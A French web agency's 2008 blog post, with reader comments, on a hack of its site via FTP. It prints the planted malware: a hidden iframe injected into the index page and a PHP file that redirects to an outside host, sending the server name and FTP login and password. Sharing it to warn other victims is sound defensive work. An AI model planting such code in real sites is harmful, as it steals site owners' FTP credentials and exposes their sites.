X

Site hacké craqué

Cylon de la série-tv Battlestar Galactica

Découvert il y a quelques jours, un de nos sites a été violé par un hacker qui s'est gentillement introduit sur le FTP. Les motifs ou l'origine n'ayant toujours aucune explication, il est bon de détailler ici la méthode de crack afin de diffuser l'information.

L'auteur (sûrement un robot puisque selon les logs l'opération s'effectue en 9 secondes !) installe dans le fichier d'index principal (.html, .php ou autre) dès la première ligne l'entête suivant :
<iframe style="width:0px; height:0px; border: 0px" src="UPLDRgogo.php"></iframe>

Parallèlement il crée un répertoire UPLDR/ contenant deux fichiers : "already.sent" et "gogo.php". Ce dernier contient :
<?
$ftp_name ="ftp://monlogin_ftp:monmotdepasse_ftp <at> ftp.monadressedomaine.com";
$remote_host = "http://alojados.com/images/put.php";
if (file_exists("already.sent"))
{
exit(0);
} else
{
$fp = fopen("already.sent", "w");
fclose($fp);
}
?>
<html><head><meta http-equiv="Refresh" content="0;url=<?echo
$remote_host."?srv=".$_SERVER['SERVER_NAME']."&ftp=".$ftp_name;?>"></head>

Malin ! Le véritable travail s'effectue sur le fameux fichier distant "put.php" permettant de naviguer tranquillement sur le FTP du site puisque les accès log/pass sont récupérés.

La recherche du propriétaire du domaine nous conduit à Séville en Espagne. Mais vue l'ampleur de l'attaque, puisque de nombreux sites français et allemands ont été également touchés depuis le 21 juin 2008, je pense que les informations trouvées si facilement cache un hacking plus ambitieux que l'unique fait d'un 'petit cracker qui s'amuse'...

La question à résoudre est : comment les accès FTP ont pu être dérobés ?
Constats communs aux sites victimes :

  • ils ont été développés avec des CMS différents et de versions différentes ;
  • certains n'ont pas de CMS : ainsi le notre n'est qu'une page html appelant un swf via SWFobject ;
  • ils sont parfois administrés par des logiciels FTP (type Filezilla, voire DreamWeaver), parfois directement administrés en FTP depuis un navigateur web ;
  • ils ont des hébergeurs différents avec des services d'hébergement différents ;
  • les accès ftp ont pour certains été échangés en interne par mail, d'autre jamais !

Alerté, de notre côté un contact technique chez OVH n'a pas trouvé d'autres réponses que : "vous devez mettre à jour votre CMS !". Point final de l'échange possible = no comment !

Si vous avez vécu ou vivez la même expérience, si vous avez plus d'explication sur le schmilblick, n'hésitez pas à intervenir ou à prendre contact directement avec nous.

10 commentaires sur cet article De “Site hacké craqué”

  1. jplale 11 juillet 2008 à 10 h 36 min

    j’ai eu ce type de hack hier (10/07/08) sur la plupart de mes sites sur OVH, FREE et autres, je penche sur un trojan sur mon pc local rapatriant les codes ftp de filezilla.

    J’étais bon pour une modif d’une vingtaine de mot de passe de mes site web et base mysql… GRRrrrr

  2. Christophe 11 juillet 2008 à 10 h 51 min

    Nous avons aussi pensé au vers ciblant FileZilla. Mais le site hacké est administré par notre client qui ne possède pas FileZilla et qui utilise directement l’accès ftp sur son navigateur web. L’enquête continue…

    Bon courage en tout cas !

  3. Rahimblak 31 juillet 2008 à 13 h 58 min

    Arf, toujours ces histoires d’Iframe. Je suis entrain de réaliser un papier sur la sécurisation des sites Internet à destination des organisations et associations. Dont voici le lien :

    http://www.rahimblakblog.fr/how-to-be-secure/

    Si vous avez des questions du point de vue « sécurité » je suis à votre entière disposition. (Ayant déjà un très gros bagage en terme de sécurité/hacking…)

  4. Christophe 1 août 2008 à 21 h 27 min

    très intéressant boulot ! petite impression et je l’embarque pour le lire sur la plage :) Merci !

  5. romain 4 septembre 2008 à 11 h 53 min

    Bonjour
    Nous avons nous aussi été victime de cette attaque. Nous n’utilisons aucun CMS sur nos sites. Les mots de passe son hashé en base de données.
    Il semble que les mots de passe aient été envoyés…mais par quoi, par quel logiciel…filezila, ou peut etre le gestionnaire de mot de passe de windows…?nous ne savons pas. Si quelqu’un pouvait apporter des informations supplémantaires…?

  6. Rahim. 4 septembre 2008 à 12 h 06 min

    Le serveur a peut-être été compris par d’autres sites sur le serveur. Si vous voulez me contacter pour discuter sur les différentes méthodes (car il y en a…) passez par mon blog (adresse mail présente à gauche.)

  7. Christophe 4 septembre 2008 à 12 h 15 min

    Romain> nous avons appris hier qu’un confrère à vu un de ses sites (un seul) hacké de la même manière courant août. Le site en question n’était pas sous CMS.

    Rahim> merci de l’aide ! En tout cas courant juillet un changement sur la sécurité des fichiers ftp a été effectué (sans communication) chez OVH : nous l’avons appris à nos dépends pour un de nos clients sur son système de transaction « out » du jour au lendemain. L’information nous a été confirmée directement par un technicien.

    Comme quoi !

  8. josh 13 octobre 2008 à 9 h 30 min

    Bonjour,

    J’ai 4 sites sur 8 hébergé chez free
    J’utilise FileZilla et DreamWeaver depuis un moment maintenant.
    Et j’ai eu la mauvaise surprise de découvrir : un répertoire « UPLDR » contenant deux fichiers « gogo.php » et « already.sent » :

    [gogo.php]

    //

    <meta http-equiv= »Refresh » content= »0;url= »>

    //

    [already.sent]
    //vide//
    ————————
    J’ai modifié tout mes mdp sur mes sites
    Mais je ne sais pas si cela va changer quelque chose.

    Quand je voie que l’opération s’effectue en 9 secondes.
    Je me demande si on peut réellement se défendre (nous utilisateurs d’hébergeur) quand on vous voie que même hébergé chez un pro comme ovh, vous avez le droit à « no comment ».

    Le plus dingue dans l’histoire, c’est que moi petit noob je n’arrive même pas à écrire certains fichiers qui nécessitent des droits sur le ftp soit disant secure. Et que des mecs arrivent à écrire sur le fichier distant “put.php”.

    Vous pensez que free est au courant ?
    Parce que là le problème c’est que comme il a trouvé mon identifiant de nom de domaine et mon mdp, il a accès a mes infos persos. Facturation (rib) et autres adresses et mail.

    a+

  9. Christophe C 13 octobre 2008 à 10 h 18 min

    Hélas Josh je ne peux dire que « bienvenue au club ». Je ne peux que vous conseiller de passer vos disques au peigne fin d’anti-spy et d’anti-virus : la supposition la plus logique étant un vers.

    Je ne peux pas me prononcer au nom de free, mais je pense que le phénomène déclenché depuis mai 2008 et les dédommagements de OVH doivent les avoir mis au courant :) Le mieux c’est de les contacter et de tout changer de toute manière.

Laisser un commentaire

Votre nom *
Votre mail *
Site internet
Message

Nous contacter

Pour nous (re)joindre

captcha

Coordonnées

NEOMA interactive by Linagora
100 Terrasse Boieldieu
Tour Franklin
92042 Paris - La Défense Cedex
France
(+33) 1 46 96 63 63